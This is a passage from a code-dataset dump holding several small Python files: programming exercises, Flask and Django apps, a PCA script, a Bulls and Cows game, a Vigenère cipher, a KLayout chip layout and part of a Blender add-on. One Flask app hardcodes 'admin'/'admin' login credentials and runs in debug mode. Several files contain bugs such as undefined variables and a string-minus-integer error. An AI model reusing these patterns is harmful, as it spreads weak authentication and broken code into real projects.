up'))\n\n\n# def end_other(a, b):\n# a = a.lower()\n# b = b.lower()\n# # return (b.endswith(a) or a.endswith(b))\n# return a[-len(b):] == b or a == b[-len(a):]\n#\n# x = end_other('eftg', 'dsfadfdfdfdafdeft')\n# print(x)\n#\n# def doubleChar(mystring):\n# result = \"\"\n# for i in mystring:\n# result += i*2\n# print(result)\n#\n# doubleChar('Hi-There')\n\n# def no_teen_sum(a, b, c):\n# return fix_teen(a) + fix_teen(b) + fix_teen(c)\n#\n# # CODE GOES HERE\n# def fix_teen(n):\n# if n in [13,14,17,18,19]:\n# return 0\n# return n\n#\n# print(no_teen_sum(2, 1, 14))\n#\n# mylist = [1,2,3,4,5,6,7,8]\n#\n# def even_bool(num):\n# return num%2 == 0\n#\n# evens = filter(even_bool,mylist)\n# print(list(evens))\n\n\ndef count_evens(nums):\n result = 0\n for i in nums:\n if i % 2 == 0:\n result += 1\n return result\n\nprint(count_evens([2, 1, 2, 3, 4]))\n","sub_path":"Django-Python-Full-Stack-Web-Devloper-master/Python_Level_One/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"247892478","text":"from flask import Flask,render_template,request,url_for\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n\tbase = {\r\n\t\t'title':'Index'\r\n\t}\r\n\treturn render_template(\"index.html\",base=base)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True,port=8070)\r\n","sub_path":"lecture0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264380366","text":"import time\r\nfrom shared.classes import ActivityMonitor\r\nfrom daemons.miscellaneous import DictccCrawler, MonitorVPN\r\n\r\ndaemons = [DictccCrawler(list_name=\"Wörter\"), MonitorVPN()]\r\n\r\nif __name__ == \"__main__\":\r\n activity_monitor = ActivityMonitor()\r\n # tell all daemons to use the same ActivityMonitor instance\r\n [daemon.set_activity_monitor(activity_monitor) for daemon in daemons]\r\n\r\n daemons.append(activity_monitor)\r\n while True:\r\n for daemon in daemons:\r\n daemon.run()\r\n time.sleep(1)\r\n","sub_path":"2021-10-03/Daemons/run_miscellaneous_daemons.py","file_name":"run_miscellaneous_daemons.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419580788","text":"from django.urls import path\nfrom Bigflow.BranchExp import views\n#from Bigflow.BranchExp import tasks\nfrom django.conf.urls import url, include\n\n\nurlpatterns = [\n url(r'^BranchExp/(?P<template_name>[\\w-]+)/$', views.Branch_Template , name='Branch_Template'),\n #url(r'^BranchExp/(?P<template_name>[\\w-]+)/$', views.Branch_Template , name='Branch_Template'),\n path('Get_expense/', views.Get_expense , name='Get_expense'),\n path('Set_expense/', views.Set_expense , name='Set_expense'),\n path('Set_premises/', views.Set_premises , name='Set_premises'),\n path('Get_premises/', views.Get_premises , name='Get_premises'),\n path('test/', views.test, name='Invoiceheader_set'),\n path('change_value/', views.change_value, name='change_value'),\n path('change_value_l/', views.change_value_l, name='change_value_l'),\n path('insertNewBranchDetails/', views.insertNewBranchDetails, name='insert_branch_details_values'),\n path('GetpropertyType/', views.brGetPropertyType, name='Br_Get_Property_Type'),\n path('get_pr_details/', views.brGetPropertyDetails, name='Br_Get_Property_Details'),\n path('get_category_subcategory/', views.get_category_subcategory, name='Category_SubCategory'),\n path('get_branch_data/', views.get_branch, name='Category_SubCategory'),\n path('get_branch_data/', views.get_branch, name='Category_SubCategory'),\n path('get_BranchExp_Meta_Data/', views.get_BranchExp_Meta_Data, name='get_BranchExp_Meta_Data'),\n path('set_schedule/', views.task_number_one, name='set_schedule'),\n path('Session_Set_Expense_Data/', views.Session_Set_Expense_Data, name='Session_Set_Expense_Data'),\n path('Session_Get_Expnese_Data/', views.Session_Get_Expnese_Data, name='Session_Get_Expnese_Data'),\n # path('Invoiceheader_set/', views.Invoiceheader_set, name='Invoiceheader_set'),\n\n #Br_Makersummary -#Br_RentCreate\n\n # path('Expense_Process',view_branchexp.Expense_Process.as_view()),\n # path('Expense_ProcessSet',view_branchexp.Expense_Process_Set.as_view())\n\n\n\n]","sub_path":"Bigflow/BranchExp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44930086","text":"''' <!-- Adrian McNulty G00328962 SPA --> '''\nfrom flask import Flask, render_template, g, request, url_for, session, redirect, flash\nfrom functools import wraps\nimport sqlite3\nimport os #This is for the secret key\napp = Flask(__name__)\napp.database = \"data/formData.db\"\n# ideally you should use a random key generator to generate a secret key for security reasons\n# but for this project we won't\n# Session key proctects the session being accessed on the clients side\n#In order to use sessions you have to set a secret key\napp.secret_key =os.urandom(24)\n\n@app.route('/')\ndef index():\n # establishes a connection to the database\n g.db = connect_db()\n # executes a query\n cur = g.db.execute('select * from results')\n #parse the data returned from the database using a dictionary\n posts = [dict(jackpot=row[0], winners=row[1]) for row in cur.fetchall()]\n g.db.close()\n # Render the home page template to show the data\n return render_template(\"homePage.html\", posts = posts)\n\n@app.route('/forum')\ndef forum():\n #establishes a connection to the database\n g.db = connect_db()\n #executes a query\n cur = g.db.execute('select * from postData')\n # parse the data returned from the database using a dictionary\n posts = [dict(name=row[0], message=row[1]) for row in cur.fetchall()]\n g.db.close()\n # Render the home page template to show the data\n return render_template(\"forum.html\", posts=posts)\n\n# Login required Decorator\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('You Need To Login First')\n return redirect(url_for('login'))\n return wrap\n\n\n@app.route('/form', methods = ['GET','POST'])\ndef form():\n if request.method == 'POST':\n name = request.form['nameInput']\n message = request.form['messageInput']\n g.db = connect_db()\n g.db.execute('INSERT INTO postData values(?,?)', (name, message))\n g.db.commit()\n g.db.close()\n #if request is a post redirect to forum\n return redirect(url_for('forum'))\n else:\n #otherwise render form template\n return render_template(\"form.html\")\n\n@app.route('/formEntry', methods = ['GET','POST'])\n@login_required\ndef formEntry():\n if request.method == 'POST':\n position = request.form['positionInput']\n names = request.form['namesInput']\n g.db = connect_db()\n g.db.execute('update results set jackpot=?,winners=? ', (jackpot, winners))\n g.db.commit()\n g.db.close()\n return render_template(\"formEntry.html\")\n\ndef connect_db():\n return sqlite3.connect(app.database)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n flash('Invalid Credentials - Please Try Again!')\n else:\n # if the users credentials are correct then the value true is assigned to logged in key\n session['logged_in'] = True\n return redirect(url_for('formEntry'))\n return render_template(\"login.html\", error=error)\n\n#This is the log out function. The secret key is deleted once session.pop() sets\n#the value of the key to false\n@app.route('/logout')\n@login_required\ndef logout():\n session.pop('logged_in', None)\n return redirect(url_for('index'))\n\n#Run the app\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"Data-Rep-Project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"408203086","text":"import os\nimport cv2\nimport numpy as np\n\n\ndata_path = 'C:\\\\Users\\\\sunsisi\\\\Desktop\\\\8_data'\nsave_path = 'C:\\\\Users\\\\sunsisi\\\\Desktop\\\\pca_data'\ntypes = []\nids = []\nnum = []\n\n\ndef pca(df, k):\n mean = np.mean(df, axis=0)\n new_df = df - mean\n print('mean')\n cov = np.cov(new_df, rowvar=0)\n print('cov')\n eigVals, eigVects = np.linalg.eig(cov)\n print('valvec')\n eigValIndic = np.argsort(-eigVals)\n print('sort')\n n_eigValIndic = eigValIndic[:k]\n n_eigVect = eigVects[:, n_eigValIndic]\n print('choose')\n data_ret = df.dot(n_eigVect)\n data_ret = np.array(data_ret)\n return data_ret, n_eigVect\n # return data_ret\n\n\ndef PCA(x, k):\n # 1、去平均值:按列求和作为该列代表维度的平均值,然后相减\n avg = np.sum(x, axis=0, keepdims=True)\n n = len(x)\n avg = avg/n\n x = np.subtract(x, avg)\n\n # 2、计算协方差、特征值、特征向量\n tx = np.transpose(x)\n S = np.matmul(tx, x)\n val, vec = np.linalg.eig(S)\n\n # 3、选择特征向量\n # sum_val = np.sum(val)\n index = np.argsort(-val)\n pic_val = val[index[:k]]\n pic_vec = vec[:, index[:k]]\n\n return np.matmul(x, pic_vec), pic_vec\n # return np.matmul(x, pic_vec)\n\n\ndef load_data():\n x = []\n global types, ids, num\n types = os.listdir(data_path)\n for t in types:\n labels = os.listdir(os.path.join(data_path, t))\n ids = ids + labels\n num.append(len(labels))\n for label in labels:\n img_paths = os.listdir(os.path.join(data_path, t, label))\n array = []\n for img_name in img_paths:\n img = cv2.imread(os.path.join(data_path, t, label, img_name), 0)\n img = cv2.resize(img, (32, 32))\n array.append(np.array(img).flatten()) # 将二维图像平铺为一维图像\n\n x.append(np.array(array).flatten())\n\n return np.array(x)\n\n\ndef save_data(x):\n if not os.path.exists(os.path.join(save_path)):\n os.makedirs(os.path.join(save_path))\n\n x = np.real(x)\n max_ = x.max()\n min_ = x.min()\n x = (x - min_) / (max_ - min_) * 256\n x = x.astype(np.uint8)\n k = 0\n for t, n in zip(types, num):\n if not os.path.exists(os.path.join(save_path, t)):\n os.makedirs(os.path.join(save_path, t))\n for i in range(n):\n np.savetxt(os.path.join(save_path, t, ids[k]), x[k], fmt=\"%d\")\n k = k + 1\n\n\n# 降维\nif __name__ == '__main__':\n x = load_data()\n print(x.shape)\n train_x = x[num[0]:len(x)]\n print(train_x.shape)\n new_train_x, w = pca(train_x, 400)\n x = x.dot(w)\n save_data(x)\n","sub_path":"DataMiningAndAnalysis/lab2/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"190496284","text":"class Sample:\n def display(self):\n print(\"In display function of sample\")\nclass Example(Sample):\n def show(self):\n print(\"In show function of sample\")\nobj=Example()\nobj.display()\nobj.show()\ninput()\n","sub_path":"basics/Python/Class/class_sample-inheritance.py","file_name":"class_sample-inheritance.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"127162259","text":"import os\nfrom bs4 import BeautifulSoup\n\nthis_dir = os.path.abspath(os.getcwd()) + '/first_step/'\nfile_names = ['first', 'second', 'third']\n\ndef wrong_answer_txt(file_name):\n ''''''\n file_input = this_dir + 'txts/' + str(file_name) + '.txt'\n matrix = open(file_input, 'r').read()\n numbers = matrix.split()\n result = 0\n for elem in numbers:\n result += int(elem)\n return result\n\ndef wrong_not_gut_answer_html(file_name):\n ''''''\n file_input = this_dir + 'htmls/' + str(file_name) + '.html'\n html_file = open(file_input).read()\n html_context = str(html_file).split()\n result = 0\n for elem in html_context:\n if elem.isdigit(): result += int(elem)\n return result\n\n# def as_needed_bs4(file_name):\n# file_input = this_dir + 'htmls/' + str(file_name) + '.html'\n# html_file = BeautifulSoup(file_input.encode('utf-8'), 'html.parser')\n# print(html_file)\n\ndef output(file_names):\n print(file_names + ':')\n print(wrong_answer_txt(files))\n # print(wrong_not_gut_answer_html(files))\n print('\\n')\n\n# as_needed_bs4('first')\n\nfor files in file_names:\n output(files)\n ","sub_path":"first_step/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"605901734","text":"import sys\nsys.path.append(\"/home/alesya/Downloads/KLayout-python-shamil_dev_sfs\")\n\nimport ClassLib\n\nfrom ClassLib.ContactPad import *\nfrom ClassLib.Resonators import *\nfrom time import time\nfrom pya import DText\nfrom ClassLib._PROG_SETTINGS import *\n\nfrom sonnetSim.matlabClient import MatlabClient\nfrom sonnetSim.pORT_TYPES import PORT_TYPES\nimport sonnetSim.sonnetLab\nfrom sonnetSim.sonnetLab import SonnetPort, SimulationBox, SonnetLab\nfrom sonnetSim.cMD import CMD\n\n\nclass CHIP:\n dx = 600e3\n dy = 600e3\n\n\napp = pya.Application.instance()\nmw = app.main_window()\nlv = mw.current_view()\ncv = None\n\n#this insures that lv and cv are valid objects\nif( lv == None ):\n cv = mw.create_layout(1)\n lv = mw.current_view()\nelse:\n cv = lv.active_cellview()\n \ncell_name = \"Transmon\"\nprint(cell_name)\n\n\nlayout = cv.layout()\nlayout.dbu = 0.001\nif not layout.has_cell(cell_name):\n layout.create_cell(cell_name)\n\ncv.cell_name = cell_name\ncell = cv.cell\n\ninfo = pya.LayerInfo(1,0)\ninfo2 = pya.LayerInfo(2,0)\nlayer_photo = layout.layer( info )\nlayer_el = layout.layer( info2 )\n\n# clear this cell and layer\ncell.clear()\n\n# setting layout view\n#lv.select_cell(cell.cell_index(), 0)\nlv.add_missing_layers()\n\n\n#Constants\n\nground = pya.Box(0, 0, CHIP.dx, CHIP.dy)\ncanvas = Region(ground)\n\nebeam = Region()\n\n\n#DRAW\n\nxmon_cpw_params = CPWParameters(20e3, 10e3)\n\narms_vert_len = 144.3e3\narms_hor_len = 200e3\nJJ_site_span = 8e3\nh_JJ = 278\nw_JJ = 150\nasymmetry = 0.5\n\ntmon = Xmon(DPoint(-10e3, CHIP.dy/2), xmon_cpw_params, arms_vert_len, arms_hor_len, JJ_site_span,\n h_JJ, w_JJ, asymmetry)\n\ntmon.place(canvas, region_name = \"photo\")\ntmon.place(ebeam, region_name = \"ebeam\")\n\nc_params = [10e3, 20e3]\nc_gamma_ef = Capacitor_small(tmon.end-DPoint(8e3,0), c_params, 18e3, 20e3, 10e3)\nc_gamma_ef.place(canvas)\n\nR = 200e3\nl = CHIP.dx-c_gamma_ef.end.x\nfeedline_cp1 = CPW_RL_Path(c_gamma_ef.end, \"L\", xmon_cpw_params, R, \n [l], [])\nfeedline_cp1.place(canvas)\n\n\ncell.shapes( layer_photo ).insert(canvas)\ncell.shapes( layer_el ).insert(ebeam)\n\nlv.zoom_fit()\n\n\n","sub_path":"Projects/Transmon lasing/Transmon and g_ge capacitor.py","file_name":"Transmon and g_ge capacitor.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648930707","text":"\"\"\"\r\nA multiplication challenge, write a multiplication table in as simple a way as possible.\r\nCompleted for a discord server.\r\n\r\n@author hornetfighter515\r\n\"\"\"\r\ndef main():\r\n for i in range(0,11):\r\n for j in range(0,11):\r\n operand_i = i\r\n if(i==0):\r\n operand_i = 1\r\n \r\n operand_j = j\r\n if(j==0):\r\n operand_j = 1\r\n\r\n result = operand_i*operand_j\r\n if(i==0 and j==0):\r\n result = \"X\"\r\n print(str( result)+ '\\t', end='')\r\n print()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"mult_table.py","file_name":"mult_table.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"652283029","text":"import os\nimport sys\n\ntry:\n from PySide import QtGui\n import pysideuic\nexcept:\n raw_input('PySide not found!')\n sys.exit(0)\n\n\nclass Window(QtGui.QWidget):\n\n def __init__(self):\n super(Window, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n\n fileName = QtGui.QFileDialog.getOpenFileName(self, 'Open UI File',\n '../..', 'UI File (*.ui)')\n if fileName:\n uiFile = open(fileName[0], 'r')\n\n parentdir = os.path.abspath(os.path.join(fileName[0], os.pardir))\n filename = os.path.basename(os.path.splitext(fileName[0])[0])\n\n pyFile = open(os.path.join(parentdir, filename) + '.py', 'w')\n\n pysideuic.compileUi(uiFile, pyFile)\n\n uiFile.close()\n pyFile.close()\n\n sys.exit(0)\n\nif __name__ == '__main__':\n\n app = QtGui.QApplicationlication(sys.argv)\n win = Window()\n sys.exit(app.exec_())\n","sub_path":"System/pyside/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"86735234","text":"import sys, os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom UcsBase import ManagedObject\nsys.path.remove(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nclass EventEpCtrl(ManagedObject):\n\tdef __init__(self):\n\t\tManagedObject.__init__(self,\"EventEpCtrl\")\n\n\t@staticmethod\n\tdef ClassId():\n\t\treturn \"eventEpCtrl\"\n\n\tDN = \"Dn\"\n\tLEVEL = \"Level\"\n\tREVERT_TIMEOUT = \"RevertTimeout\"\n\tRN = \"Rn\"\n\tSTATUS = \"Status\"\n\n\tCONST_LEVEL_CLEARED = \"cleared\"\n\tCONST_LEVEL_CONDITION = \"condition\"\n\tCONST_LEVEL_CRITICAL = \"critical\"\n\tCONST_LEVEL_INFO = \"info\"\n\tCONST_LEVEL_MAJOR = \"major\"\n\tCONST_LEVEL_MINOR = \"minor\"\n\tCONST_LEVEL_WARNING = \"warning\"\n\tCONST_REVERT_TIMEOUT_FOREVER = \"forever\"\n","sub_path":"UcsSdk-0.8.3/src/UcsSdk/MoMeta/EventEpCtrl.py","file_name":"EventEpCtrl.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61870584","text":"import os\nimport re\nfrom config import _PACKAGES, _INSTALLED_PACKAGES, SUBLIME_VERSION\nimport sublime\n\n\n# Thanks to Package Control for these two snippets of code\n# https://github.com/wbond/sublime_package_control/blob/master/package_control/package_manager.py\ndef list_default_packages():\n \"\"\" :return: A list of all default package names\"\"\"\n\n if int(sublime.version()) > 3000:\n bundled_packages_path = os.path.join(os.path.dirname(sublime.executable_path()),\n 'Packages')\n files = os.listdir(bundled_packages_path)\n\n else:\n files = os.listdir(os.path.join(os.path.dirname(_PACKAGES),\n 'Pristine Packages'))\n files = list(set(files) - set(os.listdir(\n _INSTALLED_PACKAGES)))\n packages = [file.replace('.sublime-package', '') for file in files]\n packages = sorted(packages, key=lambda s: s.lower())\n return packages\n\n\ndef installed_packages(unpacked_only=False):\n \"\"\"\n :param unpacked_only:\n Only list packages that are not inside of .sublime-package files\n\n :return: A list of all installed, non-default, package names\n \"\"\"\n\n package_names = os.listdir(_PACKAGES)\n package_names = [path for path in package_names if path[0] != '.' and os.path.isdir(os.path.join(_PACKAGES, path))]\n\n if SUBLIME_VERSION > 3000 and unpacked_only == False:\n package_files = os.listdir(_INSTALLED_PACKAGES)\n package_names += [f.replace('.sublime-package', '') for f in package_files if re.search('\\.sublime-package$', f) != None]\n\n # Ignore things to be deleted\n ignored = ['User']\n for package in package_names:\n cleanup_file = os.path.join(_PACKAGES, package, 'package-control.cleanup')\n if os.path.exists(cleanup_file):\n ignored.append(package)\n\n packages = list(set(package_names) - set(ignored) - set(list_default_packages()))\n packages = sorted(packages, key=lambda s: s.lower())\n\n return packages\n","sub_path":"local_packages_api.py","file_name":"local_packages_api.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"407795282","text":"from datetime import datetime\nimport logging.handlers\nimport logging\nimport os\nimport sys\n\n\ndef script_path():\n path = os.path.realpath(sys.argv[0])\n if os.path.isfile(path):\n path = os.path.dirname(path)\n return os.path.abspath(path)\n\n\nLOGGING_MSG_FORMAT = \"%(asctime)s [%(levelname)s] %(filename)s %(lineno)s: %(message)s\"\nLOGGING_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\nlogging.basicConfig(level=logging.INFO, format=LOGGING_MSG_FORMAT, datefmt=LOGGING_DATE_FORMAT)\nlog = logging.getLogger(\"easytrader\")\nlog.propagate = False\n\n#文件日志\nlog_path = os.path.join(script_path(), 'logs')\nif not os.path.exists(log_path):\n os.makedirs(log_path)\nfile_name = datetime.now().strftime(\"%Y-%m-%d\") + \".log\"\nlog_file = os.path.join(log_path, file_name)\nfh = logging.handlers.TimedRotatingFileHandler(log_file, 'midnight', 1, 3)\nfh.suffix = '%Y%m%d.log'\nfh.setFormatter(logging.Formatter(LOGGING_MSG_FORMAT))\nlog.handlers.append(fh)\n\n#控制台日志\nch = logging.StreamHandler()\nch.setFormatter(logging.Formatter(LOGGING_MSG_FORMAT))\nlog.handlers.append(ch)\n","sub_path":"easytrader/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"449156667","text":"from keras.layers import Input, Conv3D, Dense, MaxPooling3D, Dropout\nfrom keras.models import Model\n\n\nclass FusionNet3dBuilder(object):\n\n @staticmethod\n def build(input_shape, num_classes=1):\n\n if len(input_shape) != 4:\n raise ValueError(\"Input shape must have 4 channels\")\n\n input_img = Input(input_shape)\n print(input_img)\n conv1 = Conv3D(64, kernel_size=(3, 3, 32),\n activation='relu')(input_img)\n print(conv1)\n maxpool1 = MaxPooling3D(pool_size=(2, 2, 1))(conv1)\n print(maxpool1)\n conv2 = Conv3D(64, kernel_size=(3, 3, 32),\n activation='relu')(maxpool1)\n print(conv2)\n conv3 = Conv3D(64, 3, 3, 32, activation='relu')(conv2)\n print(conv3)\n maxpool2 = MaxPooling3D(pool_size=(2, 2, 1))(conv3)\n print(maxpool2)\n dropout = Dropout(0.5)(maxpool2)\n dense1 = Dense(2048, activation='relu')(dropout)\n print(dense1)\n output_img = Dense(num_classes, activation='softmax')(dense1)\n print(output_img)\n\n model = Model(inputs=input_img, outputs=output_img)\n return model\n\n\nmodel = FusionNet3dBuilder.build((32, 32, 32, 1))\nprint(model.summary())\n","sub_path":"ml/models/three_d/fusion_net3d.py","file_name":"fusion_net3d.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"561927567","text":"## Author Name: Flynn Gaur\n## Description: This program emulates a game similar\n## to a standard game of Bulls and Cows. \n## The players have to keep on guessing \n## until they get it right.\n\nfrom os import _exit as exit\nprint('-----------------------------------------')\nprint('------- WELCOME TO BULLS AND COWS -------')\nprint('-----------------------------------------')\nPlayer1=input('Player 1, enter your username:\\n')\nPlayer2=input('Player 2, enter your username:\\n')\ncode1=input(Player1+', enter your code:\\n') #code to be guessed by player 2\nif len(code1)!=3:\n print(Player1+', that code is not valid. Exiting.')\n exit(0)\nif code1.islower()==False or code1.isalpha()==False: #to check if its from a-z\n print(Player1+', that code is not valid. Exiting.')\n exit(0)\nif code1[0]==code1[1] or code1[1]==code1[2] or code1[0]==code1[2]: \n print(Player1+', that code is not valid. Exiting.') #to check if the characters aren't the same\n exit(0)\ncode2=input(Player2+', enter your code:\\n') #code to be guessed by player 1\nif len(code2)!=3:\n print(Player2+', that code is not valid. Exiting.')\n exit(0)\nif code1.islower()==False or code2.isalpha()==False: #to check if its from a-z\n print(Player2+', that code is not valid. Exiting.')\n exit(0)\nif code2[0]==code2[1] or code2[1]==code2[2] or code2[0]==code2[2]:\n print(Player1+', that code is not valid. Exiting.') #to check if the characters aren't the same\n exit(0)\nflag=0 \nwhile flag==0: #loop to give unlimited chances until the guess is correct\n guess1=input(str(Player1)+', enter guess:\\n')\n bulls=0\n cows=0\n i=0 #index variable\n while i<=(len(code1)-1):\n if code2[i]==guess1[i]: #comparing each character with the same index\n bulls+=1\n \n j=0 #another index variable used in getting cows value\n while j<=2:\n if code2[i]==guess1[j]:\n if code2[j]!=guess1[j]: #comparing characters with a different index\n cows+=1\n j+=1\n i+=1 \n if code2==guess1: \n print(Player1,'wins!') #once the guess is correct, the game ends with exit(0)\n exit(0)\n print(' * bulls:',bulls)\n print(' * cows: ',cows)\n guess2=input(str(Player2)+', enter guess:\\n')\n bulls=0\n cows=0\n i=0 #index variable\n while i<=(len(code1)-1):\n if code1[i]==guess2[i]: #comparing each character with the same index\n bulls+=1\n j=0 #another index variable used in getting cows value\n while j<=2:\n if code1[i]==guess2[j]:\n if code1[j]!=guess2[j]: #comparing characters with a different index\n cows+=1\n j+=1\n i+=1\n if code1==guess2:\n print(Player2,'wins!')\n exit(0) #once the guess is correct, the game ends with exit(0)\n print(' * bulls:',bulls)\n print(' * cows: ',cows)","sub_path":"bulls_and_cows.py","file_name":"bulls_and_cows.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"334517660","text":"import tkinter\r\nfrom tkinter import *\r\n#Алфавит python в chr и ord не имеет буквы ё поэтому она как с обычным алфавитом эта программа работать не будет но она шифрует Виженером с питоновским русским алфавитом\r\ndef main():\r\n l=0 # число для создания списка букв в длину кодируемой строки из букв ключевого слова\r\n o=[] # список из букв кодированной строки\r\n u=[] # список из букв ключевого слова которая имеет длину кодируемой строки\r\n b=a.get() # значение кодируемой строки\r\n p=c.get() # значение ключевого слова\r\n s = [char for char in b] # список из букв кодируемой строки\r\n k= [char for char in p] # список из букв ключевого слова\r\n for i in range(len(s)): # создание списка из букв ключевого слова во с размером длины кодируемой сроки\r\n u.append(k[l])\r\n l=l+1\r\n if l == len(k):\r\n l=0\r\n for i in range(len(s)): # сама кодировка\r\n if 1072<=ord(s[i])<=1103: # отбор: от 1072 до 1103 значения букв а-я\r\n t = ord(s[i])\r\n if t+ord(u[i])-2142>32: # вычисляем сумму номеров букв если меньше 32(количество букв в алфавите)-складываем с 1072,если больше 32 - складываем 1072 с суммой разности с алфавита и суммой нумерации\r\n o.append(chr(1072+t+ord(u[i])-2142-32))\r\n else:\r\n o.append(chr(1072 + t + ord(u[i]) - 2142))\r\n elif 1040<=ord(s[i])<=1071:\r\n t = ord(s[i]) + 32\r\n if t + ord(u[i]) - 2142 > 64:\r\n o.append(chr(1072 - t - ord(u[i]) + 2142+32)-32)\r\n else:\r\n o.append(chr(1072 + t + ord(u[i]) - 2142-32))\r\n else:\r\n o.append(s[i]) # и добавляем в новый массив\r\n return a.set(''.join(map(str, o))) # выводим кодированный массив в строку\r\n\r\nwindow = Tk()\r\nwindow.title(\"Шифр Виженера\")\r\nwindow.geometry('270x200')\r\na =StringVar()\r\nc = StringVar()\r\nlab = Label(text=\"Введите слово:\")\r\nlab.place(x=12,y=0)\r\npole = Entry(window,width=40 ,textvariable=a)\r\npole.place(x=15,y=20)\r\nlab1 = Label(text=\"Введите ключ:\")\r\nlab1.place(x=12,y=40)\r\npole1 = Entry(window,width=40 ,textvariable=c)\r\npole1.place(x=15,y=60)\r\nknopka = tkinter.Button(window, text = \"Зашифровать\",command = main)\r\nknopka.place(x=85,y=90)\r\nwindow.mainloop()\r\n","sub_path":"шифр_Виженера.py","file_name":"шифр_Виженера.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"252185788","text":"import bpy\r\nimport re\r\n\r\n\r\nfrom bl_ui import (\r\n properties_object,\r\n properties_constraint,\r\n properties_data_modifier,\r\n properties_data_shaderfx,\r\n properties_data_mesh,\r\n properties_data_curve,\r\n properties_data_metaball,\r\n properties_data_gpencil,\r\n # properties_grease_pencil_common,\r\n properties_data_armature,\r\n properties_data_bone,\r\n properties_data_lattice,\r\n properties_data_empty,\r\n properties_data_speaker,\r\n properties_data_camera,\r\n properties_data_light,\r\n properties_data_lightprobe,\r\n properties_material,\r\n properties_material_gpencil,\r\n)\r\n\r\nfrom bl_ui.properties_animviz import (\r\n MotionPathButtonsPanel,\r\n MotionPathButtonsPanel_display,\r\n)\r\n\r\nfrom .. Panels import cutting_material, workflow, sharp_options, mirror_options, operator_options, mesh_clean_options, special_options\r\n\r\npanel_node_draw = None\r\n\r\n\r\ndef options():\r\n wm = bpy.context.window_manager\r\n option = wm.Hard_Ops_helper_options\r\n\r\n if 'options' not in option.panels:\r\n option.name = 'HardOps Helper'\r\n\r\n new = option.panels.add()\r\n new.name = 'options'\r\n\r\n new.tool.add().name = 'Tool'\r\n new.object.add().name = 'Object'\r\n new.constraint.add().name = 'Constraint'\r\n new.modifier.add().name = 'Modifier'\r\n\r\n data = new.data.add()\r\n data.name = 'Data'\r\n\r\n data.mesh.add().name = 'Mesh'\r\n data.curve.add().name = 'Curve'\r\n data.surface.add().name = 'Surface'\r\n data.meta.add().name = 'Meta'\r\n data.font.add().name = 'Font'\r\n data.gpencil.add().name = 'GPencil'\r\n data.armature.add().name = 'Armature'\r\n data.lattice.add().name = 'Lattice'\r\n data.empty.add().name = 'Empty'\r\n data.speaker.add().name = 'Speaker'\r\n data.camera.add().name = 'Camera'\r\n data.light.add().name = 'Light'\r\n data.light_probe.add().name = 'Light_Probe'\r\n\r\n new.shaderfx.add().name = 'ShaderFX'\r\n new.bone.add().name = 'Bone'\r\n new.bone_constraint.add().name = 'Bone Constraint'\r\n new.material.add().name = 'Material'\r\n\r\n return option\r\n\r\n\r\ndef expand(pt):\r\n context = bpy.context\r\n wm = context.window_manager\r\n option = options()\r\n obj = context.active_object\r\n\r\n # re.split(pattern, string, maxsplit=0, flags=0)\r\n if not hasattr(pt, 'bl_options') or 'HIDE_HEADER' not in pt.bl_options:\r\n if option.context != 'DATA':\r\n panel = getattr(option.panels[0], option.context.lower())[0]\r\n return getattr(panel, F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}')\r\n\r\n else:\r\n panel = 